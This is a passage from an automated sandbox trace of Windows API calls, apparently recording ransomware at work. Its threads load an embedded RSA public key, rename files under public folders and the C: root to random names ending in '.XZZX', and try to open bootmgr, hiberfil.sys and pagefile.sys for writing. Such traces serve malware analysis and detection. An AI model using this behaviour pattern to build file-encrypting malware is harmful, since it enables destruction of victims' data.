bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.792] lstrcpyW (in: lpString1=0x2daf460, lpString2="39D4778C1CA7A7942937668620DB8BDC.XZZX" | out: lpString1="39D4778C1CA7A7942937668620DB8BDC.XZZX") returned="39D4778C1CA7A7942937668620DB8BDC.XZZX" [0211.792] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0211.792] SetErrorMode (uMode=0x1) returned 0x1 [0211.792] lstrcpyW (in: lpString1=0x2daf860, lpString2="39D4778C1CA7A7942937668620DB8BDC.XZZX" | out: lpString1="39D4778C1CA7A7942937668620DB8BDC.XZZX") returned="39D4778C1CA7A7942937668620DB8BDC.XZZX" [0211.792] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x67c7a71b, Data2=0x6e1c, Data3=0x44a5, Data4=([0]=0x97, [1]=0x66, [2]=0xed, [3]=0x1a, [4]=0x25, [5]=0x11, [6]=0xe7, [7]=0xc0))) returned 0x0 [0211.792] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\39D4778C1CA7A7942937668620DB8BDC.XZZX") returned 82 [0211.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.792] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\23A3E0F41D86680C67C7A71B20614C54.XZZX") returned 82 [0211.792] StrStrW (lpFirst="39D4778C1CA7A7942937668620DB8BDC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 850 os_tid = 0xfe4 [0211.950] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.950] lstrcpyW (in: lpString1=0x2daf460, lpString2="9C0539442839CAF8E19E36092CAFAF40.XZZX" | out: lpString1="9C0539442839CAF8E19E36092CAFAF40.XZZX") returned="9C0539442839CAF8E19E36092CAFAF40.XZZX" [0211.950] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\" [0211.950] SetErrorMode (uMode=0x1) returned 0x1 [0211.950] lstrcpyW (in: lpString1=0x2daf860, lpString2="9C0539442839CAF8E19E36092CAFAF40.XZZX" | out: lpString1="9C0539442839CAF8E19E36092CAFAF40.XZZX") returned="9C0539442839CAF8E19E36092CAFAF40.XZZX" [0211.950] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xe1000cc6, Data2=0xfa4e, Data3=0x42b8, Data4=([0]=0x90, [1]=0x68, [2]=0x21, [3]=0xda, [4]=0x85, [5]=0x5c, [6]=0x56, [7]=0xbb))) returned 0x0 [0211.951] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\9C0539442839CAF8E19E36092CAFAF40.XZZX") returned 64 [0211.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.951] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\9A7D4054413C0410E1000CC64416E858.XZZX") returned 64 [0211.951] StrStrW (lpFirst="9C0539442839CAF8E19E36092CAFAF40.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 851 os_tid = 0xfe8 [0212.106] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0212.106] lstrcpyW (in: lpString1=0x2daf460, lpString2="168E33E2343B04A525B9D9AE38C0E8ED.XZZX" | out: lpString1="168E33E2343B04A525B9D9AE38C0E8ED.XZZX") returned="168E33E2343B04A525B9D9AE38C0E8ED.XZZX" [0212.106] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0212.106] SetErrorMode (uMode=0x1) returned 0x1 [0212.106] lstrcpyW (in: lpString1=0x2daf860, lpString2="168E33E2343B04A525B9D9AE38C0E8ED.XZZX" | out: lpString1="168E33E2343B04A525B9D9AE38C0E8ED.XZZX") returned="168E33E2343B04A525B9D9AE38C0E8ED.XZZX" [0212.106] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf718bcdc, Data2=0x13a8, Data3=0x4fc3, Data4=([0]=0xb2, [1]=0xc8, [2]=0xa1, [3]=0x7b, [4]=0x34, [5]=0x14, [6]=0xf6, [7]=0x2a))) returned 0x0 [0212.106] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\168E33E2343B04A525B9D9AE38C0E8ED.XZZX") returned 78 [0212.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0212.106] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\FE404460061FD0F8F718BCDC08FAB540.XZZX") returned 78 [0212.106] StrStrW (lpFirst="168E33E2343B04A525B9D9AE38C0E8ED.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 852 os_tid = 0xfec [0212.271] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0212.271] lstrcpyW (in: lpString1=0x2daf460, lpString2="AE3F22464654D223AFF867CA4A80B66B.XZZX" | out: lpString1="AE3F22464654D223AFF867CA4A80B66B.XZZX") returned="AE3F22464654D223AFF867CA4A80B66B.XZZX" [0212.271] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0212.271] SetErrorMode (uMode=0x1) returned 0x1 [0212.271] lstrcpyW (in: lpString1=0x2daf860, lpString2="AE3F22464654D223AFF867CA4A80B66B.XZZX" | out: lpString1="AE3F22464654D223AFF867CA4A80B66B.XZZX") returned="AE3F22464654D223AFF867CA4A80B66B.XZZX" [0212.271] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xe5984a19, Data2=0x23af, Data3=0x4d9a, Data4=([0]=0x9f, [1]=0xea, [2]=0x4d, [3]=0x44, [4]=0x8b, [5]=0xea, [6]=0xe7, [7]=0x6f))) returned 0x0 [0212.271] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\AE3F22464654D223AFF867CA4A80B66B.XZZX") returned 78 [0212.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0212.271] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\C53C12170AD11A46E5984A190DABFE8E.XZZX") returned 78 [0212.271] StrStrW (lpFirst="AE3F22464654D223AFF867CA4A80B66B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 853 os_tid = 0x102c Thread: id = 855 os_tid = 0x1038 [0225.769] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0225.769] lstrcpyW (in: lpString1=0x2daf460, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0225.769] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0225.769] SetErrorMode (uMode=0x1) returned 0x1 [0225.769] lstrcpyW (in: lpString1=0x2daf860, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0225.769] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc0e4e36b, Data2=0xa723, Data3=0x4304, Data4=([0]=0x82, [1]=0xf2, [2]=0x6b, [3]=0xfb, [4]=0x5c, [5]=0xbe, [6]=0x1c, [7]=0xe7))) returned 0x0 [0225.769] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\B0AD3AB92537B4FBFE37930729309943.XZZX") returned 44 [0225.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0225.769] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\AFA5E4A12BC0C58CC0E4E36B2E9BA9D4.XZZX") returned 44 [0225.769] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 856 os_tid = 0x1040 [0225.882] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0225.882] lstrcpyW (in: lpString1=0x2daf460, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0225.882] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0225.882] SetErrorMode (uMode=0x1) returned 0x1 [0225.882] lstrcpyW (in: lpString1=0x2daf860, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0225.882] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x259a6232, Data2=0x8332, Data3=0x4989, Data4=([0]=0x81, [1]=0xea, [2]=0x8e, [3]=0x1c, [4]=0x30, [5]=0x2f, [6]=0x1b, [7]=0x52))) returned 0x0 [0225.882] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\bootmgr") returned 14 [0225.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0225.882] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\5866C3C425AF77C2259A6232288A5C0A.XZZX") returned 44 [0225.882] StrStrW (lpFirst="bootmgr", lpSrch="XZZX") returned 0x0 [0225.882] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x20) returned 0 [0225.882] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 857 os_tid = 0x1044 [0226.035] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.035] lstrcpyW (in: lpString1=0x2daf460, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0226.035] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0226.035] SetErrorMode (uMode=0x1) returned 0x1 [0226.035] lstrcpyW (in: lpString1=0x2daf860, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0226.035] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x94c28e4b, Data2=0xfe4a, Data3=0x4e2f, Data4=([0]=0x8a, [1]=0x24, [2]=0x11, [3]=0x48, [4]=0xb4, [5]=0xb6, [6]=0x2a, [7]=0x0))) returned 0x0 [0226.035] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\hiberfil.sys") returned 19 [0226.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0226.035] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\096B8BAE4DA93B9694C28E4B50841FDE.XZZX") returned 44 [0226.035] StrStrW (lpFirst="hiberfil.sys", lpSrch="XZZX") returned 0x0 [0226.035] SetFileAttributesW (lpFileName="\\\\?\\C:\\hiberfil.sys", dwFileAttributes=0x20) returned 0 [0226.035] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 858 os_tid = 0x1048 [0226.191] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.191] lstrcpyW (in: lpString1=0x2daf460, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0226.191] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0226.191] SetErrorMode (uMode=0x1) returned 0x1 [0226.191] lstrcpyW (in: lpString1=0x2daf860, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0226.191] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x2d045a86, Data2=0x259c, Data3=0x4b92, Data4=([0]=0xb6, [1]=0xe4, [2]=0x60, [3]=0xbd, [4]=0x97, [5]=0x40, [6]=0xab, [7]=0x54))) returned 0x0 [0226.191] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\pagefile.sys") returned 19 [0226.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0226.191] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\0FBC87A80B1A26F82D045A860DF50B40.XZZX") returned 44 [0226.191] StrStrW (lpFirst="pagefile.sys", lpSrch="XZZX") returned 0x0 [0226.191] SetFileAttributesW (lpFileName="\\\\?\\C:\\pagefile.sys", dwFileAttributes=0x20) returned 0 [0226.192] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 859 os_tid = 0x104c [0226.367] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.367] lstrcpyW (in: lpString1=0x2daf460, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0226.367] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0226.367] SetErrorMode (uMode=0x1) returned 0x1 [0226.367] lstrcpyW (in: lpString1=0x2daf860, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0226.367] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xef4236d3, Data2=0xe496, Data3=0x43fa, Data4=([0]=0x8d, [1]=0x5, [2]=0x35, [3]=0xb2, [4]=0x32, [5]=0x17, [6]=0xbd, [7]=0xe8))) returned 0x0 [0226.367] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\D2D9507033A5E4DB82B20D90383EC923.XZZX") returned 50 [0226.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0226.367] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\29A00BA23CB27C7CEF4236D33F8D60C4.XZZX") returned 50 [0226.367] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="XZZX") returned="XZZX" 